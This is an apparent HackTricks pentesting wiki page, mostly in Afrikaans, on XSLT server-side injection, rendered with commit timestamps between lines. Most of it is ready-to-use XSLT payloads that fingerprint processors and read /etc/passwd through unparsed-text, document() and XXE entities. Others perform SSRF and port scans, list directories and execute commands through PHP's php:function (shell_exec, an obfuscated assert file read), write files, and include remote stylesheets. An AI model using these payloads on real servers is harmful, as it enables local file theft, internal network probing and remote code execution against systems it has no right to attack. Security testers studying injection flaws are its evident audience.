2024-07-19 04:54:19 +00:00
# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 04:54:19 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 04:54:19 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 04:54:19 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-07-19 04:54:19 +00:00
## Basic Information
2020-07-15 15:43:14 +00:00
2024-07-19 04:54:19 +00:00
XSLT is 'n tegnologie wat gebruik word om XML-dokumente in verskillende formate te transformeer. Dit kom in drie weergawes: 1, 2, en 3, met weergawe 1 wat die mees algemeen gebruikte is. Die transformasieproses kan of op die bediener of binne die blaaiers uitgevoer word.
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
Die raamwerke wat die meeste gebruik word, sluit in:
2024-02-06 03:10:38 +00:00
2024-02-11 02:07:06 +00:00
- **Libxslt** van Gnome,
- **Xalan** van Apache,
- **Saxon** van Saxonica.
2024-02-06 03:10:38 +00:00
2024-07-19 04:54:19 +00:00
Vir die uitbuiting van kwesbaarhede wat met XSLT geassosieer word, is dit nodig dat xsl-tags aan die bedienerkant gestoor word, gevolg deur toegang tot daardie inhoud. 'n Voorbeeld van so 'n kwesbaarheid is gedokumenteer in die volgende bron: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/ ](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/ ).
2021-06-07 11:31:39 +00:00
2024-07-19 04:54:19 +00:00
## Example - Tutorial
2022-10-03 13:43:01 +00:00
```bash
2021-06-07 11:31:39 +00:00
sudo apt-get install default-jdk
2022-10-03 13:43:01 +00:00
sudo apt-get install libsaxonb-java libsaxon-java
2021-06-07 11:31:39 +00:00
```
{% code title="xml.xml" %}
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
<?xml version="1.0" encoding="UTF-8"?>
< catalog >
2024-02-11 02:07:06 +00:00
< cd >
< title > CD Title< / title >
< artist > The artist< / artist >
< company > Da Company< / company >
< price > 10000< / price >
< year > 1760< / year >
< / cd >
2021-06-07 11:31:39 +00:00
< / catalog >
```
2024-07-19 04:54:19 +00:00
{% endcode %}
2021-06-07 11:31:39 +00:00
{% code title="xsl.xsl" %}
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
<?xml version="1.0" encoding="UTF-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
2024-02-11 02:07:06 +00:00
< html >
< body >
< h2 > The Super title< / h2 >
< table border = "1" >
< tr bgcolor = "#9acd32" >
< th > Title< / th >
< th > artist< / th >
< / tr >
< tr >
< td > < xsl:value-of select = "catalog/cd/title" / > < / td >
< td > < xsl:value-of select = "catalog/cd/artist" / > < / td >
< / tr >
< / table >
< / body >
< / html >
2021-06-07 11:31:39 +00:00
< / xsl:template >
< / xsl:stylesheet >
```
{% endcode %}
2024-07-19 04:54:19 +00:00
Voer uit:
2024-02-06 03:10:38 +00:00
```xml
saxonb-xslt -xsl:xsl.xsl xml.xml
2024-02-11 02:07:06 +00:00
2021-06-07 11:31:39 +00:00
Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
2024-02-11 02:07:06 +00:00
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
2021-06-07 11:31:39 +00:00
< html >
2024-02-11 02:07:06 +00:00
< body >
< h2 > The Super title< / h2 >
< table border = "1" >
< tr bgcolor = "#9acd32" >
< th > Title< / th >
< th > artist< / th >
< / tr >
< tr >
< td > CD Title< / td >
< td > The artist< / td >
< / tr >
< / table >
< / body >
2021-06-07 11:31:39 +00:00
< / html >
```
2024-02-11 02:07:06 +00:00
### Vingerafdruk
2021-06-07 11:31:39 +00:00
{% code title="detection.xsl" %}
2024-02-06 03:10:38 +00:00
```xml
2022-10-03 13:43:01 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
2021-06-07 11:31:39 +00:00
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
2024-02-11 02:07:06 +00:00
Version: < xsl:value-of select = "system-property('xsl:version')" / > < br / >
Vendor: < xsl:value-of select = "system-property('xsl:vendor')" / > < br / >
Vendor URL: < xsl:value-of select = "system-property('xsl:vendor-url')" / > < br / >
< xsl:if test = "system-property('xsl:product-name')" >
Product Name: < xsl:value-of select = "system-property('xsl:product-name')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:product-version')" >
Product Version: < xsl:value-of select = "system-property('xsl:product-version')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:is-schema-aware')" >
Is Schema Aware ?: < xsl:value-of select = "system-property('xsl:is-schema-aware')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:supports-serialization')" >
Supports Serialization: < xsl:value-of select = "system-property('xsl:supportsserialization')"
2022-10-03 13:43:01 +00:00
/>< br / >
2024-02-11 02:07:06 +00:00
< / xsl:if >
< xsl:if test = "system-property('xsl:supports-backwards-compatibility')" >
Supports Backwards Compatibility: < xsl:value-of select = "system-property('xsl:supportsbackwards-compatibility')"
2022-10-03 13:43:01 +00:00
/>< br / >
2024-02-11 02:07:06 +00:00
< / xsl:if >
2021-06-07 11:31:39 +00:00
< / xsl:template >
< / xsl:stylesheet >
```
{% endcode %}
2024-02-11 02:07:06 +00:00
En voer uit
2024-02-06 03:10:38 +00:00
```xml
2024-02-11 02:07:06 +00:00
$saxonb-xslt -xsl:detection.xsl xml.xml
2021-06-07 11:31:39 +00:00
Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
2024-02-11 02:07:06 +00:00
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
2021-06-07 11:31:39 +00:00
< h2 > XSLT identification< / h2 > < b > Version:< / b > 2.0< br > < b > Vendor:< / b > SAXON 9.1.0.8 from Saxonica< br > < b > Vendor URL:< / b > http://www.saxonica.com/< br >
```
2024-02-11 02:07:06 +00:00
### Lees Plaaslike Lêer
2021-06-07 11:31:39 +00:00
2024-07-19 04:54:19 +00:00
{% code title="read.xsl" %}
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
< xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:abc = "http://php.net/xsl" version = "1.0" >
< xsl:template match = "/" >
< xsl:value-of select = "unparsed-text('/etc/passwd', 'utf-8')" / >
< / xsl:template >
< / xsl:stylesheet >
```
{% endcode %}
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
$ saxonb-xslt -xsl:read.xsl xml.xml
Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
2024-02-11 02:07:06 +00:00
Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
2021-06-07 11:31:39 +00:00
<?xml version="1.0" encoding="UTF-8"?> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
```
2022-10-03 13:43:01 +00:00
### SSRF
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
< xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:abc = "http://php.net/xsl" version = "1.0" >
< xsl:include href = "http://127.0.0.1:8000/xslt" / >
< xsl:template match = "/" >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-11 02:07:06 +00:00
### Weergawes
2021-06-07 11:31:39 +00:00
2024-07-19 04:54:19 +00:00
Daar mag meer of minder funksies wees, afhangende van die XSLT-weergawes wat gebruik word:
2021-06-07 11:31:39 +00:00
* [https://www.w3.org/TR/xslt-10/ ](https://www.w3.org/TR/xslt-10/ )
* [https://www.w3.org/TR/xslt20/ ](https://www.w3.org/TR/xslt20/ )
* [https://www.w3.org/TR/xslt-30/ ](https://www.w3.org/TR/xslt-30/ )
2024-02-11 02:07:06 +00:00
## Vingerafdruk
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
Laai dit op en neem inligting
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="ISO-8859-1"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
2024-02-11 02:07:06 +00:00
Version: < xsl:value-of select = "system-property('xsl:version')" / > < br / >
Vendor: < xsl:value-of select = "system-property('xsl:vendor')" / > < br / >
Vendor URL: < xsl:value-of select = "system-property('xsl:vendor-url')" / > < br / >
< xsl:if test = "system-property('xsl:product-name')" >
Product Name: < xsl:value-of select = "system-property('xsl:product-name')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:product-version')" >
Product Version: < xsl:value-of select = "system-property('xsl:product-version')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:is-schema-aware')" >
Is Schema Aware ?: < xsl:value-of select = "system-property('xsl:is-schema-aware')" / > < br / >
< / xsl:if >
< xsl:if test = "system-property('xsl:supports-serialization')" >
Supports Serialization: < xsl:value-of select = "system-property('xsl:supportsserialization')"
2020-07-15 15:43:14 +00:00
/>< br / >
2024-02-11 02:07:06 +00:00
< / xsl:if >
< xsl:if test = "system-property('xsl:supports-backwards-compatibility')" >
Supports Backwards Compatibility: < xsl:value-of select = "system-property('xsl:supportsbackwards-compatibility')"
2020-07-15 15:43:14 +00:00
/>< br / >
2024-02-11 02:07:06 +00:00
< / xsl:if >
2020-07-15 15:43:14 +00:00
< / xsl:template >
< / xsl:stylesheet >
```
2022-10-03 13:43:01 +00:00
## SSRF
2024-02-06 03:10:38 +00:00
```xml
2020-09-04 15:35:33 +00:00
< esi:include src = "http://10.10.10.10/data/news.xml" stylesheet = "http://10.10.10.10//news_template.xsl" >
< / esi:include >
```
2024-07-19 04:54:19 +00:00
## Javascript Inspuiting
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
< xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
< script > confirm ( "We're good" ) ; < / script >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-11 02:07:06 +00:00
## Gidslys (PHP)
2020-07-15 15:43:14 +00:00
2022-10-03 13:43:01 +00:00
### **Opendir + readdir**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
< xsl:template match = "/" >
< xsl:value-of select = "php:function('opendir','/path/to/dir')" / >
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< xsl:value-of select = "php:function('readdir')" / > -
< / xsl:template > < / xsl:stylesheet >
```
2024-07-19 04:54:19 +00:00
### **Assert (var\_dump + scandir + vals)**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="UTF-8"?>
< html xsl:version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
2024-02-11 02:07:06 +00:00
< body style = "font-family:Arial;font-size:12pt;background-color:#EEEEEE" >
< xsl:copy-of name = "asd" select = "php:function('assert','var_dump(scandir(chr(46).chr(47)))==3')" / >
< br / >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
```
2024-02-11 02:07:06 +00:00
## Lees lêers
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### **Intern - PHP**
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 11:31:39 +00:00
< xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:abc = "http://php.net/xsl" version = "1.0" >
< xsl:template match = "/" >
< xsl:value-of select = "unparsed-text('/etc/passwd', ‘ utf-8')" / >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-11 02:07:06 +00:00
### **Intern - XXE**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "/etc/passwd"> ]>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
&ext_file;
< / xsl:template >
< / xsl:stylesheet >
```
2024-07-19 04:54:19 +00:00
### **Deur HTTP**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" >
< xsl:template match = "/" >
< xsl:value-of select = "document('/etc/passwd')" / >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
< !DOCTYPE xsl:stylesheet [
<!ENTITY passwd SYSTEM "file:///etc/passwd" > ]>
< xsl:template match = "/" >
&passwd;
< / xsl:template >
```
2024-02-11 02:07:06 +00:00
### **Intern (PHP-funksie)**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
< xsl:template match = "/" >
< xsl:value-of select = "php:function('file_get_contents','/path/to/file')" / >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="UTF-8"?>
< html xsl:version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
2024-02-11 02:07:06 +00:00
< body style = "font-family:Arial;font-size:12pt;background-color:#EEEEEE" >
< xsl:copy-of name = "asd" select = "php:function('assert','var_dump(file_get_contents(scandir(chr(46).chr(47))[2].chr(47).chr(46).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100)))==3')" / >
< br / >
< / body >
2020-07-15 15:43:14 +00:00
< / html >
```
2024-07-19 04:54:19 +00:00
### Poort skandering
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
< xsl:template match = "/" >
< xsl:value-of select = "document('http://example.com:22')" / >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-11 02:07:06 +00:00
## Skryf na 'n lêer
2020-07-15 15:43:14 +00:00
2022-10-03 13:43:01 +00:00
### XSLT 2.0
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
< xsl:template match = "/" >
< xsl:result-document href = "local_file.txt" >
< xsl:text > Write Local File< / xsl:text >
< / xsl:result-document >
< / xsl:template >
< / xsl:stylesheet >
```
2024-07-19 04:54:19 +00:00
### **Xalan-J uitbreiding**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
< xsl:template match = "/" >
< redirect:open file = "local_file.txt" / >
< redirect:write file = "local_file.txt" / > Write Local File< / redirect:write >
< redirect:close file = "loxal_file.txt" / >
< / xsl:template >
```
2024-02-11 02:07:06 +00:00
Ander maniere om lêers in die PDF te skryf
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
## Sluit eksterne XSL in
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
< xsl:include href = "http://extenal.web/external.xsl" / >
```
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" ?>
<?xml-stylesheet type="text/xsl" href="http://external.web/ext.xsl"?>
```
2024-02-11 02:07:06 +00:00
## Voer kode uit
2020-07-15 15:43:14 +00:00
2022-10-03 13:43:01 +00:00
### **php:function**
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="utf-8"?>
< xsl:stylesheet version = "1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:php="http://php.net/xsl" >
< xsl:template match = "/" >
< xsl:value-of select = "php:function('shell_exec','sleep 10')" / >
< / xsl:template >
< / xsl:stylesheet >
```
2024-02-06 03:10:38 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version="1.0" encoding="UTF-8"?>
< html xsl:version = "1.0" xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl" >
< body style = "font-family:Arial;font-size:12pt;background-color:#EEEEEE" >
< xsl:copy-of name = "asd" select = "php:function('assert','var_dump(scandir(chr(46).chr(47)));')" / >
< br / >
< / body >
< / html >
```
2024-07-19 04:54:19 +00:00
Executeer kode met ander raamwerke in die PDF
2020-07-15 15:43:14 +00:00
2024-07-19 04:54:19 +00:00
### **Meer Tale**
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
**Op hierdie bladsy kan jy voorbeelde van RCE in ander tale vind:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET** ](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET ) ** (C#, Java, PHP)**
2020-09-04 18:29:25 +00:00
2024-07-19 04:54:19 +00:00
## **Toegang tot PHP statiese funksies vanaf klasse**
2021-06-07 12:06:44 +00:00
2024-02-11 02:07:06 +00:00
Die volgende funksie sal die statiese metode `stringToUrl` van die klas XSL aanroep:
2024-02-06 03:10:38 +00:00
```xml
2021-06-07 12:06:44 +00:00
<!-- - More complex test to call php class function -->
< xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" xmlns:php = "http://php.net/xsl"
version="1.0">
< xsl:output method = "html" version = "XHTML 1.0" encoding = "UTF-8" indent = "yes" / >
< xsl:template match = "root" >
< html >
<!-- We use the php suffix to call the static class function stringToUrl() -->
< xsl:value-of select = "php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" / >
<!-- Output: 'une_superstring ao modifier' -->
< / html >
< / xsl:template >
< / xsl:stylesheet >
```
2024-07-19 04:54:19 +00:00
(Example from [http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls ](http://laurent.bientz.com/Blog/Entry/Item/using\_php\_functions\_in\_xsl-7.sls ))
2021-06-07 12:06:44 +00:00
2024-07-19 04:54:19 +00:00
## More Payloads
* Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection )
* Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection ](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection )
2024-02-06 03:10:38 +00:00
2024-07-19 04:54:19 +00:00
## **Brute-Force Detection List**
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
2021-06-27 21:56:13 +00:00
2024-07-19 04:54:19 +00:00
## **References**
2020-07-15 15:43:14 +00:00
2022-10-03 13:43:01 +00:00
* [XSLT\_SSRF ](https://feelsec.info/wp-content/uploads/2018/11/XSLT\_SSRF.pdf )\\
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf ](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf )\\
2021-10-18 11:21:18 +00:00
* [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf ](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf )
2022-04-28 16:01:33 +00:00
2024-07-19 04:54:19 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
< details >
2024-07-19 04:54:19 +00:00
< summary > Support HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 04:54:19 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 04:54:19 +00:00
{% endhint %}